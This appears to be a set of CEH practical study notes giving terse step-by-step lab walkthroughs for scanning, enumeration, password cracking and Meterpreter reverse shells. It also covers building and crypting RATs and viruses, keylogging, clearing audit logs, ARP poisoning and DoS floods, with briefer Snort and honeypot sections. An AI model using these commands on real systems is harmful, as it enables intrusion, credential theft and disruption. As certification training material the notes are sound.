Penetration Testing Checklists 2022
CEH PRACTICAL NOTES
Table of Contents
FOOT PRINTING 2
SCANNING NETWORKS 3
ENUMERATION 6
VULNERABILITY ANALYSIS 9
SYSTEM HACKING 10
MALWARE THREATS 18
SNIFFING 22
SOCIAL ENGINEERING 24
DENIAL-OF-SERVICE (DOS) 25
SESSION HIJACKING 26
EVADING IDS FIREWALLS AND HONEYPOTS 27
HACKING WEB SERVERS 31
HACKING WEB APPLICATIONS 32
SQL INJECTION 35
HACKING WIRELESS NETWORKS 36
HACKING MOBILE PLATFORMS 37
CLOUD COMPUTING 38
CRYPTOGRAPHY 39
EXTRAS 41
ping hostname
-f switch do not fragment, uses to send same length, does not allow to be fragmented by routers Ping host -f -l 1300
-l buffer size Tracert host Firebug in mozilla
WinHTTrack website copier
Path Analyzer Pro in traceroute tools, ensure icmp and smart is selected, stop on control is selected Select timed trace when launching scan
Metasploit service postgresql start. The msfconsole
If db not initialized
- msfdb init
- service postgresql restart
- msfconsole
- db_status
Run nmap from msfconsole nmap -Pn -sS -A -oX Test 10.10.10.0/24 (-sS (TCP SYN scan) -Pn (No ping)
-A: Enable OS detection, version detection, script scanning, and traceroute)
db_import Test to import test results Type hosts to view host information
Type services to view services info for all detected hosts
db_nmap -sS -A 10.10.10.16 the db_nmap automatically stores result to the msf db
use scanner/smb/smb_version to find out smb version
show options to set options for the utility set RHOSTS 10.10.10.8-16 and press Enter. Type set THREADS 100 and press Enter.
Type run to start
Now type hosts again and os_flavor will be visible
Ethernet interface
hping3 -c 3 10.10.10.10 -c 3 means 3 packets
hping3 --scan 1-3000 -S 10.10.10.10 -scan (port range) -S SYN Flag
hping3 10.10.10.10 --udp --rand-source --data 500 --udp udp mode –rand-source changes source address –data data length
hping3 -S 10.10.10.10 -p 80 -c 5 -p send packet to specified port
hping3 10.10.10.10 –flood send flood packets to the target machine
Ping the server machines from different sources and look at TTL values to identify OS under the IPV4 info.
Windows 10: 128
Ubuntu: 64
ColaSof t Packet Builder
Select Adapter from right top corner
Click Add to create packet. Leave default ARP settings press OK. Send all and select burst mode.
Export as colasoft cscpkt
When opens displays sys info by default
Click IP scanner from left and enter range. Then click start. Right click aby alive IP and click Traceroute
Now select Port scanner from left pane and enter IP address Add and check it and click start
nmap -O 10.10.10.* shows OS info for IPs from 0-254
nmap --packet-trace 10.10.10.10 show all sent and received packets Slow comprehensive scan from settings
-SN Null scan
Go to the profile tab to make and edit scan profiles
nmap -sT -T3 -A 10.10.10.12 -sT TCP connect scan. Requires no special privileges to run
nmap -sX -T4 10.10.10.12 -sX Xmas scan, turn on all flags
nmap -sA -v -T4 10.10.10.12 -sA Ack scan. No response means the port is filtered and an unfiltered response means the port is closed
nmap -F <IP> Fast scan
nmap -Pn -p 80 -sI 10.10.10.16 10.10.10.12 -sI idle/zombie scan <Zombie IP> <Target IP>
nmap -sP 10.10.10.* -sP ping scan, only checks for alive hosts, no port scan Also -sn
nmap -f <target IP> | fragments packets nmap –mtu <value> <target IP> | to customize packet in bytes, Must be multiple of 8
nmap -D RND:10 10.10.10.10 | -D RND use random decoy IPs, in this example 10 Decoy IPs are generated
Start Demo
Click Manual Tools. Select ARP Ping
Select IP and click on send ARP Now Select ARP Scan (MAC Scan)
Select range from X.X.X.(1-255). Click Do Arp Scan
Now open Ping Scanner in manual Tools. Remember to use system DNS. Select IP range. Click start
Now use Port Scanner in manual tools. Select scan type TCP connect, select Target IP. Select range of ports and okay.
Click New scan, set [email protected] as password
Select private in the Stored Credentials section and public in the Discovery Credentials section In the Network Selection tab, click on IP ranges, define IP range and click next
In scheduling run scan now After summary, run discovery
Map will show, click on Node options to view IP addresses of discovered devices
Right click node, click integration with windows tools, then remote Desktop. martin:apple for login.
Set IP Range. Click on the wheel (preferences option). Select udp and tcp from pinging options. Select ports 1-1000 for custom scan.
Select only Alive Hosts display.
Choose Name Scanner from the options shown on the lower tab. Set IP range and start. Choose Port Scanner from the options shown on the lower tab. Set IP range and start. Choose UDP Scanner from the options shown on the lower tab. Set IP range and start. Choose Ping Scanner from the options shown on the lower tab. Set IP range and start.
New Audit windows opens by default. Click Next
Select IP range scan. Enter IP Range. Run credential scan Administrator:Pa$$w0rd. Click Finish. View results. Click different tabs on top to view different results.
Advanced IP Scanner
Specify IP range and start.
Right click on alive hosts to perform actions, e.g. shutdown. Use Radmin for advanced features.
Click on Windows Enumeration, Enter IP and click Enumerate
Expand local workstation to view Users, Services, User Rights, Scheduled Jobs
Enter IP Range and click scan.
Enter IP Range and click on start scanning.
Right click on any IP and click on Properties to view details.
Right click on any IP and click on Open Device to connect to the target machine. Click on “+” sign to view shared folders.
nmap -O 10.10.10.12 | OS detection scan | port 139 NetBIOS
nmap -sP 10.10.10.0/24 | perform ping sweep
nmap -sS 10.10.10.12 | perform SYN stealth scan
nmap -sSV -O 10.10.10.12 | perform SYN, version, OS detection scan
nmap -sSV -O 10.10.10.12 -oN Enumeration.txt | oN saves the scan in nmap format
nbtstat –A 10.10.10.16 display table using target IP first <00> shows workstation
<20> shares enabled
net view <IP> | enumerate share paths
net use command to view the created null sessions/shared folders from your host net use \\10.10.10.16\e ““\user:”” create a null session with the target (\ slash) net use \\10.10.10.16\e ““/user:”” to view connection details (/ slash)
Go to explorer and disconnect Z drive
Then use net use to view connected null session
Simple Network Management Protocol UDP Port 161, Accessed via community strings, read only, read/write
nmap -sU -p 161 <target IP>
nmap -sU -p 161 --script=snmp-brute 10.10.10.12 | brute force SNMP community string
use auxiliary/scanner/snmp/snmp_login | set RHOSTS | exploit
use auxiliary/scanner/snmp/snmp_enum | set RHOSTS | exploit
Type IP to connect to. <Optionally enter a domain admin credentials for advanced features, here CEH\Jason:qwerty as a sample user>.
Expand DC=CEH,DC=com and expand CN=Users
Expand a user-name and modify display name
Enum4linux [options] IP
enum4linux -u martin -p apple -U 10.10.10.12 | - u user -p pass -U get user list
enum4linux -u martin -p apple -o 10.10.10.12 | -o get OS info
enum4linux -u martin -p apple -P 10.10.10.12 | -P get password policy info enum4linux -u martin -p apple -G 10.10.10.12 | -G get groups and members info enum4linux -u martin -p apple -S 10.10.10.12 | -S get share list info
enum4linux -u martin -p apple -a 10.10.10.12 | -a get all simple enumeration data [-U -S -G -P -r -o -n -i]
https://localhost:8834 admin:password
Click Policies under Resources Tab on left side. Create New Policy Advanced ScanSet Name and DescriptionDiscovery in settings tabHost DiscoveryTurn off Ping the remote hostPort scanning Turn on Verify open TCP ports found by local port enumeratorsReport (do not alter any settings)Advanced Max number of TCP sessions per host and Max number of TCP sessions per scan as unlimitedCredentialsHostWindows AD143:[email protected]Save
ScanCreate a new scanUser DefinedCustom_PolicySet name and targetLaunch
nikto -h | view command help| -H for full help text
nikto -h http://www.goodshopping.com -Tuning 1 |-Tuning 1 Scan tuning 1=Interesting File / Seen in logs
Windows stores passwords in LM and NTLM hash format | NTLM New Technology LAN Manager. Need admin access to dump SAM.
WMIC (Windows Management Instrumentation Command) CLI to get info about local system
wmic useraccount get name,sid | displays usernames and their SIDs
pwdump7.exe -d c:\lockedfile.dat backup-lockedfile.dat |dump protected file
Brows admin terminal to pwdump7 path and run pwdump.exe in cmd | shows password hashes
PwDump7.exe > c:\hashes.txt | export hashes to path defined
In text file replace boxes with account names obtained from WMIC. The last code numbers will be the
identity. And Save the file
To crack passwords not longer than 14 characters using only alphanumeric characters
Open /x86 gui version. Load PWDUMP and select the hashes.txt file.
Select Table Vista Free. Install it from location where ophcrack files are placed. Click Crack to start cracking
Copy the Hashes.txt to shared drive for future labs.
Click on add table
Select hash NTLM, min length 4, max length 6, Chain Count 4000000, Charset Loweralpha Click OK on main window to start , table is saved in Winrtgen folder.
Open rcrack_gui.exe
Click File, then select Load NTLM hashes from PWDUMP
Open Hashes.txt saved from before
L0phtCrack
Open Password Auditing Wizard. Choose Windows. Select Remote Machine Type Host: 10.10.10.12, Select the Use Specific User Credentials Administrator:Pa$$w0rd:CEH.com
Select Strong Password Audit Perform Calibration? click No.
- msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe | -p payload, --platform platform of the target, -a architecture, -f output format, -o save the output path
- Type mkdir /var/www/html/share | make directory
- Type chmod -R 755 /var/www/html/share | change rights recursively to all files and folders inside
- Type chown -R www-data:www-data /var/www/html/share | change owner recursively owner:group
- mv /root/Desktop/Test.exe /var/www/html/share | move the exploit
- service apache2 start
Start Metasploit Framework
- Type use multi/handler
- Type set payload windows/meterpreter/reverse_tcp
- Type set LHOST 10.10.10.11
- Type set LPORT 444
- Run
- Meterpreter shell is opened on attacker side. Type sysinfo to get system details.
- Type run vnc to start vnc viewer.
- msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Exploit.exe | -e encoder, -b list of bad characters to avoid
- Type mkdir /var/www/html/share | make directory
- Type chmod -R 755 /var/www/html/share | change rights recursively to all files and folders inside
- Type chown -R www-data:www-data /var/www/html/share | change owner recursively owner:group
- mv /root/Desktop/Test.exe /var/www/html/share | move to exploit
- service apache2 start
- Type use exploit/multi/handler.
- Type set payload windows/meterpreter/reverse_tcp.
- Type set LHOST 10.10.10.11.
- Start listener, type exploit -j -z |exploit -j -z exploit tells Metasploit to start the exploit. The -j flag tells it to run in the context of a job and -z simply means to not interact with the session once it becomes active.
- Type sessions -i to view sessions
- Type sessions -i 1 to interact with the session created
- Type getuid to get user id
- Run post exploitation exploit run post/windows/gather/smart_hashdump | will fail right now
- Type getsystem | will fail right now | use getystem -h to view all available methods
- Type getsystem -t 1 | use technique 1 to escalate privileges | will fail right now
- Type background | backgrounds the meterpreter session.
- Type search uac in msfconsole | get view modules related to uac
- Type use exploit/windows/local/bypassuac_fodhelper
- Type show options | to view options related to the payload
- Type set SESSION 1 | the previous opened meterpreter session id
- Type set payload windows/meterpreter/reverse_tcp
- Type set LHOST 10.10.10.11
- Type set TARGET 0
- Type exploit
- Type getuid to get user id
- Type getsystem | to escalate privileges
- Run post exploitation exploit run post/windows/gather/smart_hashdump | to dump password hashes
Create secret.txt on Windows Desktop
Setup and run exploit like did it previous exercise
After meterpreter is successfully running, try these commands:
- sysinfo
- ipconfig
- getuid
- pwd
- ls
- cat secret.txt
- timestomp secret.txt -v | view modified, accessed, created time of file
- cd c:\ pwd ls
- download bootmgr | downloads the bootmgr file from c:\ to home directory of kali
- search -f “filename.ext” |here “pagefile.sys” | displays complete path of file
- keyscan_start | to start keylogger
- keyscan_dump | to dump keylogger results
- idletime | shows the time the target user has been away from keyboard
- shutdown | shutdown the victim machine
RDP to victim machine. Install SpyAgent from shared path
Start SpyAgent Continue Set password Complete + Stealth Configuration Load on Windows Startup Start monitoring CTRL+ALT+SHIFT+M to bring SpyAgent out of stealth mode
RDP to victim machine. Install Power Spy from shared path
Start Power Spy Set password Start monitoring + stealth mode CTRL+ALT+X to bring Power Spy out of stealth mode
Copy calc.exe from system32 dir.
Make c:\magic folder. Copy calc.exe inside it, and create a text file readme.txt Type type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
Type mklink backdoor.exe readme.txt:calc.exe
Execute backdoor.exe
Create a text file readme.txt like this
Hello world!!!!!
Copy it inside the SNOW folder Open cmd in the folder
Type snow -C -m "Secret message" -p "password" <original file name> <target file name> |-C compression, -m message string, -p password | Hide method
Type snow -C -p "password" <file name to unhide data>
- Select text message file which you want to hide
- Select the cover file image where data is to be hidden
- Set output path and file name
- Set password if needed
- Click Hide Data
- Select the stegno file
- Set the Output folder path
- Give the password
- Cick Extract Data
- Select the open image option to browse the image where data is to be hidden
- Select the open text option to browse the text file which you want to hide
- Click Hide Text to embed text in image
- Click Save Image to output the result image
- Select the open image option to open the modified image
- Hidden text will be displayed in right side bar
- Open cmd
- auditpol /get /category:* | get auditpolicies for all categories| auditpol –help for help | additpol /get /? for command help
- auditpol /set /category:"system","account logon" /success:enable /failure:enable | to set audit policies on categories separated by: then set success and failure audit status
- auditpol /clear /y | disable audit policies on all categories
- mkdir send
- cd send
- echo “secret” > message.txt
- Copy covert_tcp.c from shared path
- cc -o covert_tcp covert_tcp.c
- To send message use command ./covert_tcp -dest 10.10.10.9 -source 10.10.10.11 -source_port 8888 -dest_port 9999 -file /root/Desktop/send/message.txt | -dest <destination/receiver IP>
-source<sender IP> -file <file path> | do not run until listener is started on receiver machine
- Start wireshark before sending to capture the traffic
- View IP4 header in Wireshark traffic to view message byte by byte in order
- mkdir receive
- cd receive
- Copy covert_tcp.c from shared path
- cc -o covert_tcp covert_tcp.c
- To receive message start a listener using ./covert_tcp -dest 10.10.10.9 -source 10.10.10.11
-source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/receive/receive.txt|
-dest <destination/receiver IP> -source<sender IP> -file <file path to store received file>
Note: FUD (Fully Undetectable Crypter)
- start terminal
- Run commnd fatrat | takes time to load
- Choose [6] [3] <LHOST IP> <LPORT> <payload name> [3] Enter to create payload
- Choose [7] [2] <LHOST IP> <LPORT> <malicious doc name> <choose text or leave default> <Enter path of previous custom payload /root/TheFatRat/output/payload.exe>
[3] Enter
- Host payload using previously shown methods or run python -m SimpleHTTPServer for easy hosting
- Type use exploit/multi/handler.
- Type set payload windows/meterpreter/reverse_tcp.
- Type set LHOST 10.10.10.11.
- Type set LPORT 4444.
- Start listener, type run
- Download word file from hosting URL
- Open and enable macros
- Meterpreter session will be started on msfconsole
- Use windows 10 credentials Jason:qwerty
- Run command responder -I eth0 in Kali | “-I” is in CAPS
- Try to open a share \\ceh-tools from windows 10 machine. Responder will send fake replies. | Windows will use, LLMNR on UDP/5355 or NBT-NS on UDP/137 and will listen for broadcasts.
- User will enter credentials and hash will be intercepted by responder
- Responder log files in usr\share\responder\logs
- Use john the ripper to crack the password using command john
/usr/share/responder/logs/<file name of the logs.txt> | here file is SMBv2-NTLMv2-SSP- 10.10.10.10.txt
- Web server trojan which allows access to victim’s machine via a web browser
- Run httprat.exe
- Disable the notification option.
- Set server port 84. And create the httpserver.exe
- Run this httpserver.exe on the victim machine.
- Browser victim’s IP from attacker’s machine to gain web access to the victim
- You can view processes, system info, view drives and directories
Created in visual basic, can be set up to auto load on the victim machine, allows to perform many actions
- Go to MoSucker Folder
- Run CreateServer.exe. Leave default settings. Press OK. Save filename as server.exe
- Now MoSucker 3.0 Edit server window opens. Remember server Port 4288.
- Select Keylogger option and Enable off-line keylogger.
- Open MoSucker.exe and enter victim IP and port in given tabs.
- On the window machine execute the server.exe file and you will get an error. Ignore the error.
- On the attacker machine click on connect on the MoSucker.exe windows and you will be connected to the victim machine.
- Start Live Capture to remotely view the machine
- On victim machine open firewall settings and use recommended settings
- On attacker machine start njRAT
- Click start with default port 5552
- Click on Builder tab on the bottom
- Enter HOST IP (Attacker machine), check options Copy To StartUp and Registry StartUp, and click Build.
- Save file as Test.exe
- Open the malicious exe file on victim’s machine.
- Connection would be shown on attacker njRAT window.
- Now attacker can perform different actions on the victim machine
Run SwayzCryptor. Click File option and browse to previous created malware from njRAT Test.exe.
Select Start up, Mutex, and Disable UAC, and click Encrypt. Save file as CryptedFile.exe.
Run file on victim machine. New connection will be shown on njRAT window on attacker machine.
- Create (bottom left corner) Create ProRat Server (342 Kbayt) Notification setting (leave deafult) General Settings (only leave last 4 invisibility settings checked – remember the password) Bind with file (Select image from prorat image folder) Server Extensions {EXE (Has icon support)} Server Icon (select any) Create Server
- Named saved as binded_server by default.
- Open malicious file on victim machine
- On attacker machine, enter victim IP and Port (if changed) and click Connect. Enter password.
- Now do actions on left side to perform on victim machine
- Run server.exe on victim machine
- Run client.exe on attacker machine
- Open JPS Virus Maker.
- Select Options
- Disable Yahoo,
- Disable Internet Explorer,
- Disable Norton Anti Virus,
- Disable McAfee Anti Virus,
- Disable Taskbar,
- Disable Security Center,
- Disable Control Panel,
- Hide Windows Clock,
- Hide All Tasks in Taskmgr,
- Change Explorer Caption,
- Destroy Taskbar,
- Destroy Offlines (Y!Messenger),
- Destroy Audio Service,
- Terminate Windows
- Auto Startup.
- Choose Restart
- Name after install Rundll32
- Server Name Svchost.exe
- Click Create Virus
- Click >> for further options.
- Select Options
- Change XP Password option,
- Change Computer Name option,
- Check Change IE Home Page option
- Check the Enable Convert to Worm checkbox, and provide a Worm Name (here, fedevi).
- Select JPG Icon
- Click Restart radio button
- Create Virus
Select different options and create the worm.vbs file located in c:\
- Click New
- Load from viruses folder Klez Virus Live!\face.exe.
- Keep default settings and OK
- View Graphs Flow Chart
- View Graphs Function Calls
- Windows Hex View-1
- Windows Structures
OllyDbg – Virus Analysis
- Load virus from Viruses\tini.exe
- View Log
- View Executable modules
- View Memory
- View Threads
- View local ports, protocol, end process etc.
- View Everything, Explorer, Services, Drivers, Known DLLs
- Click Clean and SpeedUp My computer. Click Start
- Expand Registry Errors
- Select All errors and Delete.
CurrPorts
- Create trojan using njRAT and monitor it using CurrPorts.
- Click the 3rd Top icon (Scan Computer Memory for Viruses)
- Now scan C drive
- Run Regshot-x64-Unicode.exe as Administrator
- Select HTML Document
- Select 1st Shot and Save
- Install a software and run 2nd Shot and Save
- Now Select Compare WinPatrol – Startup Monitoring Tool
- Click Startup Programs to view startup programs.
- Click IE Helpers, shows tools used to IE during start. Remove Java TM plugin SSV Helper.
- Click Services, shows installed services, Right click to view service Info. Startup can be enabled or disabled from the info menu.
- Click File Types, view programs associated to a file type. Like Winrar for rar files. Right Click for
Info then click Expand Info.
- Click Active Tasks, shows current active tasks, Right click to Kill any task
- Capture login credentials for first task. Easy
Now for remote packet capture
- Go to services on target machine and start the Remote Packet Capture Protocol v.0 (experimental) service.
- Now in attacker machine, click on Capture Options (Ctrl+K) Manage Interfaces Remote Interfaces Add (+) Enter Host (10.10.10.10), Port 2022, and credentials (martin:apple) Only select New interface from Input Start
- Select Ethernet interface.
- Dashboard Summary Protocol MAC Endpoint IP Endpoint MAC Conversation IP Conversation UDP Conversation Matrix Packet Report Tab
- Select Random to generate a random MAC address
- Forward button next to Network Connection to change adapters
- Forward button next to Hardware ID to view Configuration ID
- Click IPConfig to view IP info
- Click MAC List to import MAC IDs from a text file
- Select Update MAC to change the MAC Address.
- Click Configure.
- Select Adapter with the Attacker’s IP in the Sniffer tab.
- Click on Start/Stop Sniffer (2nd icon in icon list) icon.
- Go to the Sniffer Sub tab.
- Click the Blue + (Add) icon.
- In MAC Scanner window select All Hosts and All Tests.
- Click ARP on lower left corner. Then click anywhere inside ARP window to so + icon is clickable.
- Select 1st victim IP (10.10.10.10), now select 2nd victim IP (10.10.10.12).
- Click on Start/Stop ARP (3rd icon in icon list) icon.
- Now do FTP from .12 IP to .10 with credentials martin:apple.
- Observe that packets will be generated in cain.
- Click Passwords FTP View captured credentials.
- Create an attack between two machines as shown above.
- Here, Attacker is 10.10.10.10. Victims are 10.10.10.11 and 10.10.10.16.
- Generate some random traffic between the victims e.g from .11 machine use hping3 -c 100000 10.10.10.16
- Open Wireshark on Attacker machine.
- Click Edit Preferences Protocols ARP/RARP Detect ARP request storms and Detect duplicate IP address configuration Start Capture.
- Analyze Expert Information
- Set Security level as aggressive.
- Launch an ARP attack on the network.
- View ARP poisoning alerts in XARP.
Use Credential Harvester to clone a website and capture victim credentials.
- Check open port on 10.10.10.10 using nmap | nmap -p 21 10.10.10.10
- Open Metasploit Framework
- Type use auxiliary/dos/tcp/synflood |SYN Flooding module
- Type set RHOST [Victim IP] and press Enter
- Type set RPORT 21 and press Enter
- Type set SHOST [Spoofed IP Address] and press Enter
- Type set TIMEOUT 20000 and press Enter
- View Flood attack on victim via Wireshark | use filter tcp.port=21
hping3 -S [Victim IP Address] -a [Atacker/Spoofed IP Address] -p [Port to flood e.g 22] –flood | -S turn on SYN Flag, --flood sent packets as fast as possible. Do not show replies
- Open HOIC.
- Set threads = 20
- Click + to add target
- Enter Target http://<Target IP> Power = High Booster = GenericBoost.hoic
- Click FIRE TEH LAZER! to launch attack
- First set Victim’s Proxy settings to attacker’s IP and port 8080.
- Open ZAP and enable Break Point and click green + to view break points
- Go to settings local Proxies Change IP from localhost to network IP (in this case 10.10.10.16).
- Browse from victim and view the request and responses on the attacker machine.
- Copy snort.conf from shared folder (Snort\snortrules\etc) to C:\Snort\etc.
- Copy so_rules folder from shared folder (Snort\snortrules) to C:\Snort.
- Copy preproc_rules folder from shared folder (Snort\snortrules) to C:\Snort.
- Copy rules folder from shared folder (Snort\snortrules) to C:\Snort.
- Go to folder C:\Snort\bin and open snort in cmd.
- Enter snort -W to view ethernet info. Default ethernet index is 1.
- Enter snort -dev -i 1 to enable Ethernet Driver.
- Open 2nd CMD Window. Leave the first one open.
- Ping a machine from the 2nd CMD window. Snort will generate some alerts in the first window, this means it is working.
- Close both cmd terminals.
- Open C:\Snort\etc\snort.conf in Notepad++
- HOME_NET line (Line 45), replace any with the IP addresses of the machine on which Snort is running. Here 10.10.10.12
- RULE_PATH (Line 104). In Line 104 replace ../rules with C:\Snort\rules, in Line 105 ../so_rules replace with C:\Snort\so_rules, and in Line 106 replace ../preproc_rules with C:\Snort\preproc_rules.
- Lines 109 and 110, replace ../rules with C:\Snort\rules.
- Open C:Snort\rules, create file white_list.rules and black_list.rules.
- Again, open snort.conf file.
- Dynamic preprocessor libraries (Line 243), replace /usr/local/lib/snort_dynamicpreprocessor/
with C:\Snort\lib\snort_dynamicpreprocessor.
- Base preprocessor (or dynamic) engine (Line 246); replace
/usr/local/lib/snort_dynamicengine/libsf_engine.so with
C:\Snort\lib\snort_dynamicengine\sf_engine.dll.
- Comment (#) Line 249.
- Comment (#) Lines 261-265.
- Line 325 delete lzma word.
- Remove \ on Line 504-509.
- Comment (#) Lines 504-509.
- Add output alert_fast: alerts.ids Line 533.
- Now open Replace all and replace ipvar with var.
- Save the snort.conf fie.
ICMP Detection Rule
- Open C:\Snort\rules\icmp-info.rules.
- Type alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.10.12 (msg:"ICMP-INFO PING"; icode:0; itype:8; reference:arachnids,135; reference:cve,1999-0265; classtype:bad-unknown; sid:472; rev:7;) in Line 21.
- Save the file.
- Opne cmd in C:Snort and Type snort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii | here X=1 , l is small L
- Ping the snort machine and rules will be displayed in cmd
- Open inetmgr
- Expand Server node Sites FTP Right click Manage FTP Stop
- Install HoneyBOT
- Configure HoneyBOT
- General settings as default
- Exports Export Logs to CSV.
- Target the honeyBOT machine with ftp connection.
- View logs and details
- Enable victim firewall. Create inbound rule and block connection from attacker IP.
- Run different scans from attacker machine. Use Zombie scan to bypass firewall rule. | nmap -sI
<Zombie IP> <Target IP>
- Open Services. Disable IIS Admin Service and World Wide Web Publishing.
- Open HTTHost Options tab, keep default options
- Change Personal Password to “magic”.